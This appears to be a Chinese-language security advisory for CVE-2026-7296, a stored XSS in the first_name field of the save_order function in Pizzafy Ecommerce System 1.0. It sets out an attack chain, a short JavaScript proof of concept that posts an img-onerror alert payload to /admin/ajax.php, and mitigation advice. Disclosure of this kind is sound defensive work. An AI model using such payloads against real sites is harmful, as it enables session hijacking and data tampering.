CVE-2026-7296 CVSS 2.4 低危

CVE-2026-7296 Pizzafy电商系统存储型XSS漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7296

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

SourceCodester Pizzafy Ecommerce System

漏洞概述

SourceCodester Pizzafy Ecommerce System 1.0版本存在跨站脚本漏洞。由于/admin/ajax.php文件的save_order函数未能正确过滤first_name参数，拥有高权限的攻击者可注入恶意脚本，诱导用户交互后执行代码，影响系统完整性。

技术细节

该漏洞位于SourceCodester Pizzafy Ecommerce System 1.0的/admin/ajax.php文件中，具体涉及save_order处理函数。漏洞成因是程序对first_name参数缺乏有效的输入过滤和上下文感知的输出转义。攻击者首先需要获得系统的高权限账户（PR:H），随后在订单创建或修改环节，向first_name字段注入恶意Payload。尽管需要用户交互（UI:R），但一旦受害用户访问受污染的订单页面，嵌入的XSS代码便会触发，可能导致会话劫持或数据篡改，从而破坏系统完整性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标使用的是SourceCodester Pizzafy Ecommerce System 1.0版本。

STEP 2

2. 获取权限

攻击者通过某种方式获取了系统的高权限账户（如管理员账号）。

STEP 3

3. 注入Payload

攻击者利用高权限登录后台，在订单管理功能处，向`first_name`参数提交包含JavaScript代码的恶意数据。

STEP 4

4. 触发漏洞

诱导其他具有查看订单权限的用户（如管理员或审核人员）访问包含恶意数据的订单页面。

STEP 5

5. 执行攻击

受害者的浏览器解析未经过滤的恶意代码，执行脚本，可能导致Cookie窃取或权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-7296
// Target: /admin/ajax.php?action=save_order
// Parameter: first_name

// Malicious payload to be injected into the first_name field
var maliciousPayload = "<img src=x onerror=alert('CVE-2026-7296')>";

// Simulated HTTP POST request to exploit the vulnerability
fetch('/admin/ajax.php?action=save_order', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: 'first_name=' + encodeURIComponent(maliciousPayload) + '&status=1'
});

影响范围

SourceCodester Pizzafy Ecommerce System 1.0

防御指南

临时缓解措施

建议立即检查系统版本并应用官方补丁。在未修复前，应限制对/admin/ajax.php接口的访问权限，并部署Web应用防火墙（WAF）检测并拦截针对save_order接口的恶意XSS payload输入。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7296
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7296
3 Details https://www.cvedetails.com/cve/CVE-2026-7296/
4 VulDB https://vuldb.com/cve/CVE-2026-7296
5 Link https://github.com/joaodrmmd/VulDB-Reports/blob/main/XSS%20-%20Orders.pdf
6 Link https://vuldb.com/submit/803175
7 Link https://vuldb.com/vuln/359956
8 Link https://vuldb.com/vuln/359956/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表